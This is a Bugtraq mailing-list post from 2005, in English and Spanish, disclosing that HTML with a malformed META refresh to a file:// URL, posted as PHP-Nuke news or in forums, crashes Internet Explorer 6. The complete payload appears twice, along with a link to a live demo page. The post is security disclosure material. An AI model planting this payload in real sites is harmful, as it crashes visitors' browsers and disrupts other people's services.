html code include in phpnuke news crash IE 6

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: html code include in phpnuke news crash IE 6
From: WoRmZ Web <wormz.web@xxxxxxxxx>
Date: 13 Mar 2005 22:47:52 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


www.wormzweb.tk

------------------------------------------------------------------------
------------------------------------------------------------------------
ENGLISH
------------------------------------------------------------------------
------------------------------------------------------------------------

An html code include in the news in php-nuke (6.5 patched tested) make visitors 
with Internet Explorer 6 to crash. 

The code is the following:
******************************************************
<html> 

<head> 
<META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\"> 
</head> 

<body> 
</body> 

</html>

******************************************************

Submit news with this code without the admin verification, or submited by the 
admin will produce a error in Internet Explorer 6.x

This code can be included in forums or other places which allow html code with 
the same result.

You can read more about this in spanish:
http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1

And you can test it (IE will crahs about 5 seconds after the web will be 
completed charged)in this link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164

------------------------------------------------------------------------
------------------------------------------------------------------------
SPANISH
------------------------------------------------------------------------
------------------------------------------------------------------------


Un código html incluido en las noticias de php-nuke (probado en la 6.5 
parcheada) hace a los viitantes con Internet Explorer un error. (Se produce el 
cierre del navegador)


El código es el siguiente:
******************************************************
<html> 

<head> 
<META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\"> 
</head> 

<body> 
</body> 

</html>

******************************************************


Un usuario podría enviar una noticia incluyendo este codigo y sin la 
vereficación del administrador, o el propio envio por el administrador 
provocará que los visitantes de la web que usen Internet Explorer 6.x se les 
cierre la página y produzca error en el navegador

Este código puede ser incluido en foros y otros lugares que permitan código 
html con el mismo resultado.

Puedes leer mas sobre este bug en el siguente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1

Puedes ver el codigo en uso y testear como funciona en el siguente link (Usando 
IE 6.x se cerrará el navegador pasados unos 5 segundos después de que la página 
se haya cargado completamente):

http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164

________________________________________________________________________

Para mas info [::wormz::] www.wormzweb.tk

Follow-Ups:
- Re: html code include in phpnuke news crash IE 6
  - From: Berend-Jan Wever

Prev by Date: RE: Av issues
Next by Date: PlantinumFTP server <= 1.0.18 Remote DOS exploit
Previous by thread: Not SQL injection and XSS in paFileDB?
Next by thread: Re: html code include in phpnuke news crash IE 6
Index(es):
- Date
- Thread